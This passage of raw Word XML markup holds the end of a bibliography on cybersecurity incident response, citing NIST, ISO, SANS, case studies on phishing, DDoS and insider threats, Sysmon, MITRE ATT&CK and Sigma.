          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Gaithersburg, MD: U.S. Department of Commerce.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R36f19b477e31463b">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="45D9C79F" w:rsidP="732EE1AE" w:rsidRDefault="45D9C79F" w14:paraId="7AA59F2F" w14:textId="0D8EBD24">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>International Organization for Standardization (ISO).</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(2016).</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ISO/IEC 27035-1: Information Security Incident Management – Principles of Incident Management.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Geneva, Switzerland: ISO/IEC.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R7101d9f1cfee4a82">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.iso.org/standard/60803.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="45D9C79F" w:rsidP="732EE1AE" w:rsidRDefault="45D9C79F" w14:paraId="4497E258" w14:textId="401E1D5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SANS Institute.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(n.d.).</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Incident Handler’s Handbook.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> SANS Reading Room.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R81ba09d692f64a46">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="45D9C79F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://www.sans.org/white-papers/incident-handlers-handbook/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EDEEAD0" w:rsidP="732EE1AE" w:rsidRDefault="7EDEEAD0" w14:paraId="4F19402B" w14:textId="3912F45A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bishop, M., Engle, S., </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Peisert</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, S., Whalen, S., &amp; Gates, C. (2009). </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Case Studies of an Insider Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. University of California, Davis. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R30fcd9ea06b349ca">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="4DD71CB4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>2009-BEGPW-HICSS-Insider.pdf?</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EDEEAD0" w:rsidP="732EE1AE" w:rsidRDefault="7EDEEAD0" w14:paraId="23CD33BC" w14:textId="32C0F614">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Case study: Distributed Denial of Service attacks (DDoS)</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (June 2020). The Engine Room. Retrieved from</w:t>
      </w:r>
      <w:hyperlink r:id="Ra06c167b3b084f4d">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="253E68B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>OrgSec-Case-study-DDoS-attacks-June-2020.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EDEEAD0" w:rsidP="732EE1AE" w:rsidRDefault="7EDEEAD0" w14:paraId="7948068B" w14:textId="702AA196">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Phishing Attack: A Case Study and their Prevention Techniques</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. IJFMR (2024). Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R31f3b8d075ff4c6a">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="61E859DE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>29087.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EDEEAD0" w:rsidP="732EE1AE" w:rsidRDefault="7EDEEAD0" w14:paraId="4A32F8AC" w14:textId="2D91E505">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Althobaiti, K. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A Case Study of Phishing Incident Response in a University</w:t>
      </w:r>
      <w:r w:rsidRPr="732EE1AE" w:rsidR="7EDEEAD0">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="Rba80100f4ac54477">
        <w:r w:rsidRPr="732EE1AE" w:rsidR="17B18E76">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>A Case Study of Phishing Incident Response in an Educational Organization</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="7EDEEAD0" w:rsidP="732EE1AE" w:rsidRDefault="7EDEEAD0" w14:paraId="14B1B71D" w14:textId="15DFBE4E" w14:noSpellErr="1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="73FF2745">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Kont, M. et al. (2018). </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="73FF2745">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Insider Threat Detection Study</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="73FF2745">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. CCDCOE. Retrieved from </w:t>
      </w:r>
      <w:hyperlink r:id="R23853d79b0c542bc">
        <w:r w:rsidRPr="166587AE" w:rsidR="59EA99BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Insider_Threat_Study_CCDCOE.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4C2DE037" w:rsidP="166587AE" w:rsidRDefault="4C2DE037" w14:paraId="27E2C8C8" w14:textId="6D240871">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft, </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sysmon (System Monitor) Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, Microsoft Learn. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="R947bb889de524a1d">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://learn.microsoft.com/en-us/sysinternals/downloads/sysmon</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R3dfbf9246c074387">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Microsoft Learn</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4C2DE037" w:rsidP="166587AE" w:rsidRDefault="4C2DE037" w14:paraId="2FA3323A" w14:textId="725C48F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SwiftOnSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">-config — </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A Sysmon</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file template</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, GitHub. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="R2f0db076ee04460f">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/SwiftOnSecurity/sysmon-config</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R983a1838509f4f1d">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GitHub</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="4C2DE037" w:rsidP="166587AE" w:rsidRDefault="4C2DE037" w14:paraId="1AE35E3D" w14:textId="01DC3039">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE Corporation, </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, MITRE. (See the main ATT&amp;CK site for details)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4C2DE037" w:rsidP="166587AE" w:rsidRDefault="4C2DE037" w14:paraId="0A2ACD95" w14:textId="5ED15BE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sigma Project, </w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Sigma Rules Repository</w:t>
      </w:r>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, GitHub. Available: </w:t>
      </w:r>
      <w:hyperlink r:id="R6bcccb5877f54e85">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://github.com/SigmaHQ/sigma</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R2d01bdf077504afd">
        <w:r w:rsidRPr="166587AE" w:rsidR="4C2DE037">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:noProof w:val="0"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GitHub</w:t>
        </w:r>
        <w:r>
          <w:br/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="3AC58756" w14:textId="48501E7A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="166587AE" w:rsidP="166587AE" w:rsidRDefault="166587AE" w14:paraId="46876433" w14:textId="6B1EBECE">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="732EE1AE" w:rsidP="732EE1AE" w:rsidRDefault="732EE1AE" w14:paraId="1E6148B1" w14:textId="5B205243">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="240" w:beforeAutospacing="off" w:after="240" w:afterAutospacing="off"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
